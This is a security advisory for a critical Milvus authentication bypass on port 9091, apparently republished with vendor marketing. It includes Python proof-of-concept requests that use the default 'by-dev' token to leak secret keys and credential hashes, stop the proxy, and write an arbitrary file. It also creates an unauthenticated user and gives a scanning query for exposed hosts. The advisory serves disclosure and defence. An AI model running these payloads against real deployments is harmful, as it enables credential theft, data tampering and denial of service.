CVE-2026-26190

CVE-2026-26190 is a critical-severity missing authentication for critical function vulnerability in github.com/milvus-io/milvus (go), affecting versions < 2.5.27. It is fixed in 2.5.27, 2.6.10.

Summary

Milvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:

  1. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath (default: by-dev), enabling arbitrary expression evaluation.
  2. The full REST API (/api/v1/*) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.

Details

Vulnerability 1: Weak Default Authentication on /expr Endpoint

The /expr endpoint on port 9091 accepts an auth parameter that defaults to the etcd.rootPath value (by-dev). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:

  • Information/Credential Disclosure: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via param.MinioCfg.SecretAccessKey.GetValue(), rootcoord.meta.GetCredential(ctx, 'root'), etc.
  • Denial of Service: Invoking proxy.Stop() to shut down the proxy service.
  • Arbitrary File Write (potential RCE): Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.

Vulnerability 2: Unauthenticated REST API on Metrics Port

Business-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via registerHTTPServer() in internal/distributed/proxy/service.go (line 170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.

An attacker can perform any business operation without credentials, including:

  • Creating, listing, and deleting collections
  • Inserting and querying data
  • Creating, listing, and deleting user credentials
  • Modifying user passwords

Proof of Concept

PoC 1, /expr Endpoint Exploitation

import requests

url = "http://<target>:9091/expr"

# Leak sensitive configuration (e.g., MinIO secret key)
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "param.MinioCfg.SecretAccessKey.GetValue()"
}, timeout=5)
print(res.json().get("output", ""))

# Retrieve hashed credentials for the root user
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "rootcoord.meta.GetCredential(ctx, 'root')"
}, timeout=5)
print(res.json().get("output", ""))

# Denial of Service, stop the proxy
res = requests.get(url, params={
    "auth": "by-dev",
    "code": "proxy.Stop()"
}, timeout=5)

# Arbitrary file write (potential RCE)
for cmd in [
    'param.Save("proxy.accessLog.localPath", "/tmp")',
    'param.Save("proxy.accessLog.formatters.base.format", "whoami")',
    'param.Save("proxy.accessLog.filename", "evil.sh")',
    'querycoord.etcdCli.KV.Put(ctx, "by-dev/config/proxy/accessLog/enable", "true")'
]:
    requests.get(url, params={"auth": "by-dev", "code": cmd}, timeout=5)

PoC 2, Unauthenticated REST API Access

import requests

target_url = "http://<target>:9091"

# Create a user without any authentication
res = requests.post(f"{target_url}/api/v1/credential", json={
    "username": "attacker_user",
    "password": "MTIzNDU2Nzg5",
})
print(res.json())

# List all users
res = requests.get(f"{target_url}/api/v1/credential/users")
print(res.json())  # {'status': {}, 'usernames': ['root', 'attacker_user']}

# Create and delete collections, insert data, all without authentication

Internet Exposure

A significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:

http.body="404 page not found" && port="9091"

This indicates the vulnerability is actively exploitable in real-world production environments.

Recommended Fixes

  1. Remove or disable the /expr endpoint in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.
  2. Do not register business API routes on the metrics port. Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.
  3. Bind port 9091 to localhost by default (127.0.0.1:9091) so it is not externally accessible unless explicitly configured.
  4. Enforce authentication on all API endpoints, regardless of which port they are served on.

User Mitigations (until patched)

  • Block external access to port 9091 using firewall rules or network policies.
  • If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.
  • Change the etcd.rootPath from the default value by-dev to a strong, random value (partial mitigation only, does not address the unauthenticated REST API).

Credit

This vulnerability was discovered and responsibly reported by YingLin Xie ([email protected]). It was independently reported by 0x1f and zznQ (ac0d3r).

Impact

An unauthenticated remote attacker with network access to port 9091 can:

  1. Exfiltrate secrets and credentials, MinIO keys, etcd credentials, user password hashes, and all internal configuration values.
  2. Manipulate all data, Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.
  3. Manage user accounts, Create administrative users, reset passwords, and escalate privileges.
  4. Cause denial of service, Shut down proxy services, drop databases, or corrupt metadata.
  5. Write arbitrary files, Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.

A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.

CVE-2026-26190 has a CVSS score of 9.8 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.5.27, 2.6.10); upgrading removes the vulnerable code path.

Affected versions

github.com/milvus-io/milvus (< 2.5.27) github.com/milvus-io/milvus (>= 2.6.0, < 2.6.10)

Security releases

github.com/milvus-io/milvus → 2.5.27 (go) github.com/milvus-io/milvus → 2.6.10 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade the following packages to resolve this vulnerability:

github.com/milvus-io/milvus to 2.5.27 or later; github.com/milvus-io/milvus to 2.6.10 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-26190? CVE-2026-26190 is a critical-severity missing authentication for critical function vulnerability in github.com/milvus-io/milvus (go), affecting versions < 2.5.27. It is fixed in 2.5.27, 2.6.10. A critical operation is accessible without requiring any authentication.
  2. How severe is CVE-2026-26190? CVE-2026-26190 has a CVSS score of 9.8 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/milvus-io/milvus are affected by CVE-2026-26190? github.com/milvus-io/milvus (go) versions < 2.5.27 is affected.
  4. Is there a fix for CVE-2026-26190? Yes. CVE-2026-26190 is fixed in 2.5.27, 2.6.10. Upgrade to this version or later.
  5. Is CVE-2026-26190 exploitable, and should I be worried? Whether CVE-2026-26190 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-26190 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-26190?
    • Upgrade github.com/milvus-io/milvus to 2.5.27 or later
    • Upgrade github.com/milvus-io/milvus to 2.6.10 or later

Other vulnerabilities in github.com/milvus-io/milvus

CVE-2025-64513

Stop the waste.
Protect your environment with Kodem.